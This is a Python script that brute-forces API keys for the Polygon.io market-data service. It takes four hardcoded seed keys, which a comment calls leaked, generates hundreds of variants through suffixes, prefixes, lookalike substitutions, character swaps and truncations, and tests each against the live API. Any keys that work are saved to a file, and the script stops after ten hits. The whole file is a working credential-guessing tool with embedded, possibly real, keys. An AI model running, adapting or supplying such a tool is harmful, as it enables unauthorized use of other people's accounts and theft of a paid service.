import requests
import time
import json
from datetime import datetime
import random
import string

# ================= CONFIGURATION =================
BASE_KEYS = [
    "DRET3GcgohidlQj2TFfGVqWB5YTenYO1",
    "N_vWCV2FygpTrFothrLGfQdRlsh3a8pA",
    "L2udhpBOmCwTcNveVYWYAjMwzZYmiH6o",
    "CzxFFW4318BxCrYj088wykFOnA3hCamv"
]

TARGET_URL = "https://api.polygon.io/v2/aggs/ticker/AAPL/prev"
OUTPUT_FILE = "valid_keys.txt"
DELAY_SECONDS = 0.25 
MAX_VALID_KEYS = 10  # Stop after finding this many valid keys

# ================= MUTATION ENGINE (INFINITE) =================
def generate_combinations(base_key, counter=0):
    """Generates variations of the key to test with infinite mutations."""
    variants = [base_key]  # Start with exact match
    
    # 1. Append numbers (infinite: 0, 1, 2...) - cycles through 0-49
    for i in range(counter % 50 + 1):
        variants.append(f"{base_key}{i}")
    
    # 2. Prefix common strings
    prefixes = ["poly_", "test_", "dev_", "prod_", "live_", "staging_", "api_", "demo_", "sandbox_"]
    for p in prefixes:
        variants.append(p + base_key)
        
    # 3. Middle insertions (_5, _99, etc.)
    for i in range(counter % 20 + 1):
        variants.append(f"{base_key}_{i}")
    
    # 4. Case variations (swap case of individual characters)
    if len(base_key) > 8:
        mid_idx = len(base_key) // 2
        variants.append(base_key[:mid_idx] + base_key[mid_idx].upper() + base_key[mid_idx+1:])
    
    # 5. Common environment markers
    env_markers = ["_prod", "_dev", "_test", "_live", "_staging", "_main", "_master"]
    for marker in env_markers:
        variants.append(base_key + marker)
        
    # 6. Character substitution (common typos in leaked keys - ALL lookalikes)
    char_substitutions = {
        '0': ['O', 'o'], '1': ['I', 'l', 'L'], '2': ['Z', 'S'], 
        '3': ['E', '8'], '4': ['A', '@'], '5': ['S', '$'],
        '6': ['G', '&'], '7': ['T', '+'], '8': ['B', '3'],
        '9': ['G', '9'], 'O': ['0'], 'I': ['1', 'l', 'L'], 
        'L': ['1', 'I'], 'S': ['2', '$'], 'Z': ['2']
    }
    
    for char, subs in char_substitutions.items():
        if char in base_key:
            idx = base_key.find(char)
            variants.append(base_key[:idx] + random.choice(subs) + base_key[idx+1:])
    
    # 7. Position swaps (swap adjacent characters - common typos)
    for i in range(len(base_key) - 1):
        swapped = base_key[:i] + base_key[i+1] + base_key[i] + base_key[i+2:]
        variants.append(swapped)
    
    # 8. Segment rotations (rotate small chunks of the key)
    chunk_size = 4
    for i in range(0, len(base_key) - chunk_size, chunk_size):
        segment = base_key[i:i+chunk_size]
        rotated = segment[1:] + segment[0] if len(segment) > 1 else segment
        variants.append(base_key[:i] + rotated + base_key[i+chunk_size:])
    
    # 9. Truncation (test shorter versions - some APIs accept partial keys)
    for length in range(32, len(base_key)):
        variants.append(base_key[:length])
        
    return list(set(variants))

# ================= TESTER ENGINE =================
def test_key(api_key):
    """Tests a single key against Polygon API."""
    url = f"{TARGET_URL}?apiKey={api_key}"
    try:
        response = requests.get(url, timeout=10)
        
        return {
            "key": api_key,
            "status_code": response.status_code,
            "valid": response.status_code == 200,
            "response_time_ms": response.elapsed.total_seconds() * 1000
        }
    except Exception as e:
        return {
            "key": api_key,
            "status_code": "ERROR",
            "valid": False,
            "error": str(e)
        }

# ================= MAIN EXECUTION (INFINITE LOOP - STOP AT 10) =================
def main():
    print(f"🚀 Starting Polygon API Key Tester (Infinite Scan - Stop at {MAX_VALID_KEYS} valid keys)...")
    print(f"⏱️  Base URL: {TARGET_URL}")
    
    # Generate all combinations for each base key
    all_keys = []
    total_variants = 0
    
    for i, base in enumerate(BASE_KEYS):
        variants = generate_combinations(base)
        all_keys.extend(variants)
        total_variants += len(variants)
        
        print(f"\n🔑 Seed Key #{i+1}: {base[:25]}...")
        print(f"   Generated Variations: {len(variants)}")

    print(f"\n📦 Total keys to test: {len(all_keys)}")
    
    valid_results = []
    invalid_count = 0
    
    # Test each key with rate limiting (Polygon API has limits!)
    for i, api_key in enumerate(all_keys):
        result = test_key(api_key)
        
        if result["valid"]:
            print(f"✅ VALID: {api_key}")
            valid_results.append(result)
            
            # Check if we've found enough valid keys
            if len(valid_results) >= MAX_VALID_KEYS:
                print(f"\n🎯 Target Reached! Found {len(valid_results)} valid keys.")
                break  # Stop after finding 10 valid keys
            
        else:
            # Only print errors occasionally to avoid spam (every 30th invalid key)
            if i % 30 == 0 or "ERROR" in str(result.get("status_code", "")):
                print(f"❌ INVALID ({result['status_code']}): {api_key}")
        
        # Rate limiting - Polygon API has rate limits (~10-20 req/sec)
        time.sleep(DELAY_SECONDS)
    
    # ================= SAVE RESULTS =================
    output_data = {
        "timestamp": datetime.now().isoformat(),
        "total_tested": len(all_keys),
        "valid_count": len(valid_results),
        "invalid_count": invalid_count,
        "results": valid_results
    }
    
    with open(OUTPUT_FILE, 'w') as f:
        json.dump(output_data, f, indent=2)
    
    print(f"\n💾 Results saved to {OUTPUT_FILE}")
    print(f"🎯 Final Count: {len(valid_results)} valid keys found!")

if __name__ == "__main__":
    main()
